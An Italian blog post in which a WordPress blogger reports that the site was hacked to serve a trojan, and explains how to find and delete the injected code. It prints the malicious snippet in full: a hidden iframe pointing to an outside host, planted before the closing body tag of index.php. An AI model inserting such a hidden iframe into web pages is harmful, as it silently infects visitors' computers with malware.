Grazie ad una segnalazione di un lettore di blographik, ho scoperto mio malgrado che nell’intera giornata di ieri, questo blog è stato violato da qualche “simpatico burlone”, ed è diventato portatore sano di un troian (che tra l’altro ho preso anch’io nel mio portatile). In questo articolo ti segnalo come risolvere il problema se sei incappato anche tu in questo problema.
Ecco l’email di un lettore che mi segnala:
Chiedo venia nel caso mi sbagli, ma c’è un iframe nascosto nel tuo sito che potrebbe caricare nel computer del visitatore un virus. O il mio antivirus è troppo premuroso o qualcuno ha violato il tuo sistema aggiungendo prima del tag </body> un richiamo al sito cds5fir.com.
Se notate dei rallentamenti nell’aprire firefox o altri programmi probabilmente avete anche voi questo simpatico amico nel vostro pc.
A te blogger consiglio…
Per evitare che questo virus si doffonda, ho cercato di trovare la stringa di codice nei file di blographik che mi portassero ad eliminare il problema.
Ho trovato la funzione in php che creava un iframe nascosto, ecco come puoi risolvere anche tu il problema:
01. vai sulla index.php del tuo blog su piattaforma wordpress;
02. cerca la seguente stringa:
<div style="visibility:hidden"><iframe src="http://cds5fir.com/ld/grb/" width=100 height=80></iframe></div>
03. Eliminala ed aggiorna il file sul server dove è presente il tuo blog.
04. Nel caso non l’avessi già fatto, aggiorna wordpress alle versione 2.5, che dovrebbe risolvere anche qualche falla di sicurezza delle versioni precedenti.